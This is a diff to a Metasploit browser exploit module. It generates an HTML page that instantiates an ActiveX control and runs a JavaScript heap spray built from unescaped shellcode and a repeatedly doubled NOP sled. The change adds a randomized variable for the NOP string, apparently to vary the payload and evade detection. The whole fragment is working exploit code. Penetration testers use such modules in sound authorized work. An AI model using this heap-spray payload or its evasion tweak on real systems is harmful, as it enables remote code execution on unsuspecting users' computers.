@@ -86,12 +86,14 @@ class MetasploitModule < Msf::Exploit::Remote
     rand6  = rand_text_alpha(rand(100) + 1)
     rand7  = rand_text_alpha(rand(100) + 1)
     rand8  = rand_text_alpha(rand(100) + 1)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     content = %Q|<html>
 <object id='#{vname}' classid='clsid:36723F97-7AA0-11D4-8919-FF2D71D0D32C'></object>
 <script language="JavaScript">
 var #{rand1} = unescape('#{shellcode}');
-var #{rand2} = unescape('#{nops}');
+var #{randnop} = "#{nops}";
+var #{rand2} = unescape(#{randnop});
 var #{rand3} = 20;
 var #{rand4} = #{rand3} + #{rand1}.length;
 while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};
